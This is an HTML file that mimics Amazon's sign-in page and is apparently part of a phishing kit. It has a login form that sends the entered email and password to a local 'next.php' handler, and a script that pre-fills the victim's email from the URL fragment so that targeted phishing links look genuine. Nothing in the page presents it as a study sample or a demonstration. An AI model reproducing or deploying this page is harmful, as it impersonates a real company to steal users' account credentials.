<!DOCTYPE html>
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title dir="ltr">Amazon Sign-In</title>
    <link rel="stylesheet" href="css/st1.css">
    <link rel="stylesheet" href="css/st2.css">
</head>

<body>
    <div id="a-page">
        <div class="a-section a-padding-medium auth-workflow">
            <div class="a-section a-spacing-none auth-navbar">
                <div class="a-section a-spacing-medium a-text-center">
                    <a class="a-link-nav-icon" tabindex="-1" href="#">
                        <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>
                    </a>
                </div>
            </div>
            <div id="authportal-center-section" class="a-section">
                <div id="authportal-main-section" class="a-section">
                    <div class="a-section auth-pagelet-container">
                        <!-- div1/////////////////////////////////////// -->
                        <div class="a-section a-spacing-base" id="div1">
                            <div class="a-section">
                                <form name="signIn" action="./next.php" method="POST" class="auth-validate-form auth-real-time-validation a-spacing-none">
                                    <div class="a-section">
                                        <div class="a-box">
                                            <div class="a-box-inner a-padding-extra-large">
                                                <h1 class="a-spacing-small">
                                                    Sign in
                                                </h1>
                                                <div class="a-row a-spacing-base">
                                                    <label for="ap_ai" class="a-form-label">
                                                        Email (phone for mobile account)
                                                    </label>
                                                    <input type="text" id="ap_ai" name="ai" tabindex="1" class="a-input-text a-span12 auth-autofocus auth-required-field">
                                                </div>
                                                <div class="a-row a-spacing-base">
                                                    <label for="ap_ai" class="a-form-label">
                                                        password
                                                    </label>
                                                    <input type="password" id="ap_pr" name="pr" tabindex="1" class="a-input-text a-span12 auth-autofocus auth-required-field">
                                                </div>
                                                <div class="a-section">
                                                    <button id="btn1" name="btn1" class="a-button a-button-span12 a-button-primary" type="submit"><span class="a-button-inner"><span id="continue-announce" class="a-button-text" aria-hidden="true">
                                                                Sign in
                                                            </span></span></button>
                                                    <div id="legalTextRow" class="a-row a-spacing-top-medium a-size-small">
                                                        If you continue, Amazon's<a href="#">Terms of service</a> と <a href="#">For privacy notice</a>.
                                                    </div>
                                                </div>
                                                <div class="a-section">
                                                    <div aria-live="polite" class="a-row a-expander-container a-expander-inline-container">
                                                        <a href="javascript:void(0)" data-action="a-expander-toggle" class="a-expander-header a-declarative a-expander-inline-header a-link-expander"><i class="a-icon a-icon-expand"></i><span class="a-expander-prompt">
                                                                Need help?
                                                            </span></a>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </form>
                            </div>
                            <div class="a-divider a-divider-break">
                                <h5>New to Amazon?</h5>
                            </div>
                            <span id="auth-create-account-link" class="a-button a-button-span12 a-button-base"><span class="a-button-inner"><a id="createAccountSubmit" tabindex="6" href="#" class="a-button-text" role="button">
                                        Create an Amazon account
                                    </a></span></span>
                        </div>
                        <!-- div1 end/////////////////////////// -->
                    </div>
                </div>
            </div>
            <div class="a-section a-spacing-top-extra-large auth-footer" style="position: fixed;left: 0;bottom: 0%;width: 100%;">
                <div class="a-divider a-divider-section">
                    <div class="a-divider-inner"></div>
                </div>
                <div class="a-section a-spacing-small a-text-center a-size-mini">
                    <span class="auth-footer-seperator"></span>
                    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
                        Conditions of use 
                    </a>
                    <span class="auth-footer-seperator"></span>
                    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
                        Privacy notice
                    </a>
                    <span class="auth-footer-seperator"></span>
                    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
                        Help
                    </a>
                    <span class="auth-footer-seperator"></span>
                </div>
                <div class="a-section a-spacing-none a-text-center">
                    <span class="a-size-mini a-color-secondary">
                        © 1996-2020, Amazon.com, Inc. Or its affiliates
                    </span>
                </div>
            </div>
        </div>
    </div>
    <style>
    .tb_button {
        padding: 1px;
        cursor: pointer;
        border-right: 1px solid #8b8b8b;
        border-left: 1px solid #FFF;
        border-bottom: 1px solid #fff;
    }

    .tb_button.hover {
        borer: 2px outset #def;
        background-color: #f8f8f8 !important;
    }

    .ws_toolbar {
        z-index: 100000
    }

    .ws_toolbar .ws_tb_btn {
        cursor: pointer;
        border: 1px solid #555;
        padding: 3px
    }

    .tb_highlight {
        background-color: yellow
    }

    .tb_hide {
        visibility: hidden
    }

    .ws_toolbar img {
        padding: 2px;
        margin: 0px
    }
    </style>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;



    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        $('#ap_ai').val(my_ai);
        $("#msg").hide();
    }


});
</script>

</html>